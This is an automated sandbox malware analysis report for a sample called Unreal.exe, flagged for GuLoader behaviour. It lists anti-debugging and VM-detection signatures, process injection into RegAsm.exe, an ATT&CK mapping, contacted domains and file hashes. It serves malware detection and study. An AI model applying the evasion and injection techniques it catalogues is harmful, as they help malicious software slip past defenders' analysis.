        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742E2ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742E52504 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742DDF810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle,
        Source: C:\Users\user\Desktop\Unreal.exe | System information queried: ModuleInformation
        Source: WerFault.exe, 0000000C.00000002.5640399370.0000000002748000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW<
        Source: RegAsm.exe, 00000008.00000002.5647356413.0000000001108000.00000004.00000020.sdmp, WerFault.exe, 0000000C.00000003.5635072235.000000000277E000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
        Source: mpasdlta.vdm.23.dr | Binary or memory string: KqEMUm
        Source: Unreal.exe, 00000000.00000002.3501696726.0000000002260000.00000004.00000001.sdmp, RegAsm.exe, 00000008.00000000.5526462839.0000000000FE0000.00000004.00000001.sdmp | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: Unreal.exe, 00000000.00000002.3501696726.0000000002260000.00000004.00000001.sdmp | Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32USERPROFILE=windir=\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe\syswow64\msvbvm60.dll
        Source: Unreal.exe, 00000000.00000002.3501073850.00000000005B4000.00000004.00000020.sdmp | Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe8

        Anti Debugging:

        Hides threads from debuggers
        Source: C:\Users\user\Desktop\Unreal.exe | Thread information set: HideFromDebugger
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Thread information set: HideFromDebugger
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742E33BFC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742E30C0C GetProcessHeap,HeapAlloc,InitializeCriticalSectionAndSpinCount,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 8_2_00D599BA rdtsc
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 8_2_00D5E567 mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 8_2_00D5D56C mov eax, dword ptr fs:[00000030h]
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 8_2_00D59749 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Unreal.exe | Process queried: DebugPort
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Process queried: DebugPort
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742E4B798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742E4BF4C SetUnhandledExceptionFilter,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742E4BD68 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

        HIPS / PFW / Operating System Protection Evasion:

        Writes to foreign memory regions
        Source: C:\Users\user\Desktop\Unreal.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: D50000
        Source: unknown | Process created: C:\Windows\System32\wevtutil.exe C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\A491FE0B-CBB3-0812-A9E9-28E6069853FA.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
        Source: C:\Users\user\Desktop\Unreal.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 'C:\Users\user\Desktop\Unreal.exe'
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742E2F884 GetCurrentProcess,GetLengthSid,InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetLastError,CloseHandle,SetLastError,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742E2E0C4 AllocateAndInitializeSid,FreeSid,
        Source: RegAsm.exe, 00000008.00000000.5538042827.0000000001700000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
        Source: RegAsm.exe, 00000008.00000000.5538042827.0000000001700000.00000002.00020000.sdmp | Binary or memory string: Progman
        Source: RegAsm.exe, 00000008.00000000.5538042827.0000000001700000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
        Source: RegAsm.exe, 00000008.00000000.5538042827.0000000001700000.00000002.00020000.sdmp | Binary or memory string: /Program Manager
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742E2418C cpuid
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742DDF3E8 GetCurrentProcessId,GetCurrentProcessId,CreateNamedPipeW,GetCurrentProcessId,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe | Code function: 23_2_00007FF7EC298ED4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | Code function: 24_2_00007FF742E2D78C RtlGetVersion,RtlNtStatusToDosError,SetLastError,GetLastError,

        Stealing of Sensitive Information:

        GuLoader behavior detected
        Source: Initial file | Signature Results: GuLoader behavior

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Command and Scripting Interpreter 1 | Windows Service 1 | Access Token Manipulation 1 | Masquerading 3 | Input Capture 1 | System Time Discovery 1 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 21 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Service Execution 2 | DLL Side-Loading 1 | Windows Service 1 | Virtualization/Sandbox Evasion 22 | LSASS Memory | Query Registry 1 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Process Injection 113 | Access Token Manipulation 1 | Security Account Manager | Security Software Discovery 341 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | DLL Side-Loading 1 | Process Injection 113 | NTDS | Virtualization/Sandbox Evasion 22 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 114 | SIM Card Swap | (none) | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Process Discovery 3 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | (none) | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 2 | Cached Domain Credentials | File and Directory Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | (none) | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading 1 | DCSync | System Information Discovery 14 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | (none) | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | (none) | Generate Fraudulent Advertising Revenue

        Behavior Graph


        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
Behavior Graph ID: 1369 | Sample: Unreal.exe | Startdate: 27/09/2021 | Architecture: WINDOWS | Score: 92

Node 2 (start)
  DNS/IP: spclient.wg.spotify.com; prda.aadg.msidentity.com; 2 other IPs or domains
  Signatures: Found malware configuration; Multi AV Scanner detection for submitted file; GuLoader behavior detected; 3 other signatures
  • Node 8: Unreal.exe (1), started by node 2
    Signatures: Writes to foreign memory regions; Tries to detect Any.run; Hides threads from debuggers
    • Node 18: RegAsm.exe (13), started by node 8
      DNS/IP: drive.google.com 142.250.185.142, 443, 49763 GOOGLEUS United States
      Signatures: Tries to detect Any.run; Hides threads from debuggers
      • Node 30: WerFault.exe (22 16), started by node 18
      • Node 32: conhost.exe, started by node 18
    • Node 22: RegAsm.exe, started by node 8
  • Node 11: mpam-20b5c938.exe (4), started by node 2
    Dropped: C:\Windows\ServiceProfiles\...\mpavdlta.vdm, PE32+; C:\Windows\ServiceProfiles\...\mpasdlta.vdm, PE32+; C:\Windows\ServiceProfiles\...\MpSigStub.exe, PE32+
    • Node 24: MpSigStub.exe (1), started by node 11
  • Node 14: wevtutil.exe (8 1), started by node 2
    • Node 26: conhost.exe, started by node 14
  • Node 16: wevtutil.exe (1), started by node 2
    • Node 28: conhost.exe, started by node 16

The numbers in parentheses after a process name are the counters displayed on that graph node (see the legend above).


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

Source | Detection | Scanner | Label | Link
Unreal.exe | 13% | ReversingLabs | Win32.Trojan.Ursu |

        Dropped Files

Source | Detection | Scanner | Label | Link
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | 0% | Virustotal | | Browse
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe | 0% | ReversingLabs | |
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpasdlta.vdm | 0% | Virustotal | | Browse
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpavdlta.vdm | 0% | Virustotal | | Browse

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
drive.google.com | 142.250.185.142 | true | false | | high
edge-web.dual-gslb.spotify.com | 35.186.224.25 | true | false | | high
spclient.wg.spotify.com | unknown | unknown | false | | high

              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://drive.google.com/I | RegAsm.exe, 00000008.00000002.5647356413.0000000001108000.00000004.00000020.sdmp | false | | high
https://drive.google.com/A | RegAsm.exe, 00000008.00000002.5647356413.0000000001108000.00000004.00000020.sdmp | false | | high

                  Contacted IPs


                  Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
142.250.185.142 | drive.google.com | United States | | 15169 | GOOGLEUS | false

                  General Information

                  Joe Sandbox Version:33.0.0 White Diamond
                  Analysis ID:1369
                  Start date:27.09.2021
                  Start time:16:30:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 13m 44s
                  Hypervisor based Inspection enabled:false
                  Report type:light
                  Sample file name:Unreal.exe
                  Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
                  Run name:Suspected Instruction Hammering
Number of new started processes analysed:30
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal92.troj.evad.winEXE@14/8@2/1
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:Failed
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .exe
Warnings:
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 20.54.122.82, 40.125.122.176, 8.248.115.254, 8.248.143.254, 8.253.95.120, 67.26.81.254, 67.26.137.254, 52.242.97.97, 20.54.89.15, 20.199.120.85, 20.199.120.151, 20.190.160.129, 20.190.160.2, 20.190.160.136, 20.190.160.4, 20.190.160.6, 20.190.160.75, 20.190.160.134, 20.190.160.67, 20.42.65.92, 104.89.38.104, 2.21.143.74, 2.21.140.235, 20.199.120.182
                  • Excluded domains from analysis (whitelisted): definitionupdates.microsoft.com.edgekey.net, fg.download.windowsupdate.com.c.footprint.net, slscr.update.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, e13678.dscb.akamaiedge.net, www.tm.a.prd.aadg.trafficmanager.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, fe3.delivery.dsp.mp.microsoft.com.nsatc.net, e11290.dspg.akamaiedge.net, wns.notify.trafficmanager.net, www.microsoft.com-c-3.edgekey.net, go.microsoft.com, login.live.com, slscr.update.microsoft.com.akadns.net, definitionupdates.microsoft.com, client.wns.windows.com, e3673.g.akamaiedge.net, sls.update.microsoft.com.akadns.net, wu-shim.trafficmanager.net, ctldl.windowsupdate.com, wdcp.microsoft.com, wd-prod-cp.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, sls.emea.update.microsoft.com.akadns.net, wdcpalt.microsoft.com, fe3.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, umwatson.events.data.microsoft.com, www.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

Time | Type | Description
16:33:03 | API Interceptor | 1x Sleep call for process: RegAsm.exe modified
16:37:10 | API Interceptor | 1x Sleep call for process: WerFault.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
edge-web.dual-gslb.spotify.com | hVlpEajflR.exe | Get hash | malicious | Browse | 35.186.224.25

                  ASN

                  No context

                  JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
37f463bf4616ecd445d4a1937da06e19 | Silver_Light_Group_DOC03027321122.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | 7XmWGse79x.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | m5W1BZQU4m.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | hHsIHUGICB.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | NOgYb2fHbO.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | VwDvbAowp0.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | lXy3MnXJ83.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | BXTOD28N3I.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | Kapitu.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | SebwAujas5.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | nxW9yUgdYM.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | Payment_Advice.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | cxBR3cCGTw.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | k5THcVgINl.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | b2i2IopgOC.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | G2BPn4a7o1.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | Dokument VAT I - 85926 09 2021 MAG-8.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | qOsCIQD1uR.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | NC7bm1PoKj.exe | Get hash | malicious | Browse | 142.250.185.142
37f463bf4616ecd445d4a1937da06e19 | p0FDRanFUE.exe | Get hash | malicious | Browse | 142.250.185.142

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_RegAsm.exe_bf83f564e97574c9bbf23ac35112572b5de6d5_e9e275a3_bac2586d-6b28-40ad-af6b-2dc7bcda6e5d\Report.wer
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):14172
                  Entropy (8bit):3.7655413027301523
                  Encrypted:false
                  SSDEEP:192:bmNk2b1Q4TmSaAa403TaU5QPmRtDu76PfAIO8ErPf:yNkAQFSaA4aU++tDu76PfAIO8wPf
                  MD5:EB077F8A99E22283743F463500155C8B
                  SHA1:72A799BACC0F6537298B6EE2B8E78706F85FB711
                  SHA-256:F3D1AF47BA08A576BA22D99FB21B2C0C8ECA0909C1182D7330DF4A741F7A62FA
                  SHA-512:BDA7B9AD678F33CD47E102E0FF23F2DBCB4896D50C85BFAF6F5536B7A2D535989EBD17755C626FDD8F4242DD30D68F626A86F82BD3891A2F9DB184ACC73A280D
                  Malicious:false
                  Reputation:low
                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.7.2.3.0.6.2.6.7.2.9.5.4.4.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.7.2.3.0.6.2.9.0.8.8.3.5.1.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.c.2.5.8.6.d.-.6.b.2.8.-.4.0.a.d.-.a.f.6.b.-.2.d.c.7.b.c.d.a.6.e.5.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.0.e.f.6.6.e.-.2.1.a.9.-.4.6.a.7.-.9.8.d.3.-.8.9.7.f.6.9.3.e.c.5.4.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.5.4.-.0.0.0.1.-.0.0.1.0.-.5.5.5.a.-.f.5.e.2.b.4.b.3.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.e.e.e.8.b.2.5.7.3.f.7.1.e.8.d.5.c.3.e.e.7.e.5.3.a.f.3.e.6.7.7.2.e.0.9.0.d.0.f.3.!.
                  C:\ProgramData\Microsoft\Windows\WER\Temp\WEREA47.tmp.dmp
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:Mini DuMP crash report, 14 streams, Mon Sep 27 15:37:07 2021, 0x1205a4 type
                  Category:dropped
                  Size (bytes):76462
                  Entropy (8bit):2.1964997599695373
                  Encrypted:false
                  SSDEEP:384:TCRsn5gyGXQHCT4PE6ipvxx518uKlDp5kK:TTn5gyg7TsETxHBIDp5kK
                  MD5:70F9CA1B43425219D7E8BE4CE40F89B5
                  SHA1:762B772DB4621C73A0BF077706A35333F955611F
                  SHA-256:4B1D46C06B7270351D218F0E559F31D36DF5424EDD0DD84071BB250FA8FD9B1B
                  SHA-512:46C963CEC4BBD273D9329A9B7A40A916F54B4BC998962A31D127C689ACB774116425671B6B59F6FEAB7023B52BF3A237D84F1C5D8F66E26C2CA92B5840DA2F43
                  Malicious:false
                  Preview: MDMP..a..... .......#.Qa..............................bJ.......(......GenuineIntel...........T.......T.....Qa.............................0..................G.M.T. .S.t.a.n.d.a.r.d. .T.i.m.e...................................................G.M.T. .D.a.y.l.i.g.h.t. .T.i.m.e...................................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.9.0.4.1...5.4.6.....................................................................................................
                  C:\ProgramData\Microsoft\Windows\WER\Temp\WEREFC6.tmp.WERInternalMetadata.xml
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):6362
                  Entropy (8bit):3.72809936357387
                  Encrypted:false
                  SSDEEP:192:R9l7lZNi0I6TbtYzFN4acpDR89bf/sbsfM1m:R9lnNi76TbtYp5fLfT
                  MD5:7397ACE7BCE045EB5049FB6C752EE5C7
                  SHA1:D428A0E75DDE5AD16804515C35008CB01BF580CF
                  SHA-256:83AC34525B6AA26568FE0DC7F6A964831247844677A84EE585AD18567362BCAB
                  SHA-512:44C5D442D586EF438112177D22257D20BA3B8F0BE3DE937CF74E550A3393155C6685806BB4B37862F12A15E1178CCECC97B49D28F51CE628C33300B222237E21
                  Malicious:false
                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.0.8.<./.P.i.
                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERF092.tmp.xml
                  Process:C:\Windows\SysWOW64\WerFault.exe
                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):4830
                  Entropy (8bit):4.5178125588485045
                  Encrypted:false
                  SSDEEP:48:cvIwwtl8zs/Me702I7VFJ5WS2CfjkMs3rm8M4JfuDm4OqFl/u+q8oBX/OFH/ELu1:uILf/x7GySPf+Jfuvp2vtSHau84uWrd
                  MD5:D065B32D803F90219D2FA5BAB571DDD2
                  SHA1:DC90C8EA75C341C4DBF75A3E100F4227D2A2CA44
                  SHA-256:4B5CA7DFF2D32147039A8EAF1615B961EED5779F3EE1BCDCD8EE169D11FD7496
                  SHA-512:943D2F5268F30F0AA912A8B0EE4C0D7F3CB503BF9818886DEC81249480A6F56BD8B4BC216E418585DB28DB07E9FD4D5BD319CDFE2F5F3F87C0F3900BEC7C9520
                  Malicious:false
                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="221284459" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe
                  Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe
                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):803176
                  Entropy (8bit):6.37118649960636
                  Encrypted:false
                  SSDEEP:24576:Ghj1QlBYDgtUUvie3n+pB3+ojRlcD1VyZTFXk:GhpQlBHtBYla1VyZpU
                  MD5:01F92DC7A766FF783AE7AF40FD0334FB
                  SHA1:45D7B8E98E22F939ED0083FE31204CAA9A72FA76
                  SHA-256:FA42B9B84754E2E8368E8929FA045BE86DBD72678176EE75814D2A16D23E5C26
                  SHA-512:BEA5F3D7FB0984C4A71720F25644CE3151FCDC95586E1E2FFE804D04567AAF30D8678608110E241C7DDF908F94882EDDD84A994573B0C808D1C064F0E135A583
                  Malicious:false
                  Antivirus:
                  • Antivirus: Virustotal, Detection: 0%, Browse
